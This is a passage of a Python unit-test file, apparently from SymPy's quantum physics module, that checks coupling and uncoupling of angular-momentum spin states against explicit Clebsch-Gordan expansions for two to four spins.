JzKetCoupled(3, 3, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3)))
) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(
JzKetCoupled(
3, 2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 3
)
assert (
uncouple(
JzKetCoupled(
3, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(
JzKetCoupled(
3, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(
JzKetCoupled(
3, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(
JzKetCoupled(
3, -2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3))
)
)
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 6
)
assert uncouple(
JzKetCoupled(3, -3, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 3)))
) == TensorProduct(
JzKet(S.Half, -S(1) / 2),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
assert (
uncouple(
JzKetCoupled(
2, 2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 3
- sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 6
)
assert (
uncouple(
JzKetCoupled(
2, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 3
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 12
- sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 12
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 6
)
assert (
uncouple(
JzKetCoupled(
2, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 2
- TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S(1) / 2, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
2, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 6
- sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 3
- sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 12
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 3
)
assert (
uncouple(
JzKetCoupled(
2, -2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 3
)
assert (
uncouple(
JzKetCoupled(
1, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 1))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 5
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 30
)
assert (
uncouple(
JzKetCoupled(
1, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 1))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 10
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(
JzKetCoupled(
1, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 1))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 20
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 5
)
def test_uncouple_symbolic():
assert uncouple(JzKetCoupled(j, m, (j1, j2))) == Sum(
CG(j1, m1, j2, m2, j, m) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)),
(m1, -j1, j1),
(m2, -j2, j2),
)
assert uncouple(JzKetCoupled(j, m, (j1, j2, j3))) == Sum(
CG(j1, m1, j2, m2, j1 + j2, m1 + m2)
* CG(j1 + j2, m1 + m2, j3, m3, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
)
assert uncouple(JzKetCoupled(j, m, (j1, j2, j3), ((1, 3, j13), (1, 2, j)))) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j13, m1 + m3, j2, m2, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
)
assert uncouple(JzKetCoupled(j, m, (j1, j2, j3, j4))) == Sum(
CG(j1, m1, j2, m2, j1 + j2, m1 + m2)
* CG(j1 + j2, m1 + m2, j3, m3, j1 + j2 + j3, m1 + m2 + m3)
* CG(j1 + j2 + j3, m1 + m2 + m3, j4, m4, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
(m4, -j4, j4),
)
assert uncouple(
JzKetCoupled(j, m, (j1, j2, j3, j4), ((1, 3, j13), (2, 4, j24), (1, 2, j)))
) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j2, m2, j4, m4, j24, m2 + m4)
* CG(j13, m1 + m3, j24, m2 + m4, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
(m4, -j4, j4),
)
def test_couple_2_states():
# j1=1/2, j2=1/2
assert JzKetCoupled(0, 0, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(0, 0, (S.Half, S.Half))))
)
assert JzKetCoupled(1, 1, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, S.Half))))
)
assert JzKetCoupled(1, 0, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, S.Half))))
)
assert JzKetCoupled(1, -1, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, S.Half))))
)
# j1=1, j2=1/2
assert JzKetCoupled(S.Half, S.Half, (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(S.Half, S.Half, (1, S.Half))))
)
assert JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), Rational(3, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), Rational(3, 2), (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half))))
)
# j1=1, j2=1
assert JzKetCoupled(0, 0, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(0, 0, (1, 1))))
)
assert JzKetCoupled(1, 1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (1, 1))))
)
assert JzKetCoupled(1, 0, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (1, 1))))
)
assert JzKetCoupled(1, -1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (1, 1))))
)
assert JzKetCoupled(2, 2, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 2, (1, 1))))
)
assert JzKetCoupled(2, 1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 1, (1, 1))))
)
assert JzKetCoupled(2, 0, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 0, (1, 1))))
)
assert JzKetCoupled(2, -1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -1, (1, 1))))
)
assert JzKetCoupled(2, -2, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -2, (1, 1))))
)
# j1=1/2, j2=3/2
assert JzKetCoupled(1, 1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(1, 0, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(1, -1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, 2, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, 2, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, 1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, 1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, 0, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, 0, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, -1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, -1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, -2, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, -2, (S.Half, Rational(3, 2)))))
)
def test_couple_3_states():
# Default coupling
# j1=1/2, j2=1/2, j3=1/2
assert JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half)) == expand(
couple(
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half)))
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half)
) == expand(
couple(
uncouple(
JzKetCoupled(Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half))
)
)
)
assert JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(
Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half)
) == expand(
couple(
uncouple(
JzKetCoupled(Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half))
)
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half)
) == expand(
couple(
uncouple(
JzKetCoupled(Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half))
)
)
)
# j1=1/2, j2=1/2, j3=1
assert JzKetCoupled(0, 0, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(0, 0, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(1, 1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(1, 0, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(1, -1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, 2, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, 1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, 0, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, -1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, -2, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, 1))))
)
# Couple j1+j3=j13, j13+j2=j
# j1=1/2, j2=1/2, j3=1/2, j13=0
assert JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
S.Half,
(S.Half, S(1) / 2, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
),
((1, 3), (1, 2)),
)
)
# j1=1, j2=1/2, j3=1, j13=1
assert JzKetCoupled(
S.Half, S.Half, (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half, S.Half, (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
S.Half, Rational(-1, 2), (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half, Rational(-1, 2), (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2), S.Half, (1, S.Half, 1), ((1, 3, 1), (1, 2, Rational(3, 2)))
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
S.Half,
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)
def test_couple_4_states():
# Default coupling
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert JzKetCoupled(1, 1, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(1, 0, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(1, -1, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, 2, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, 1, (S.Half, S.Half, S.Half, S.Half)) == expand(
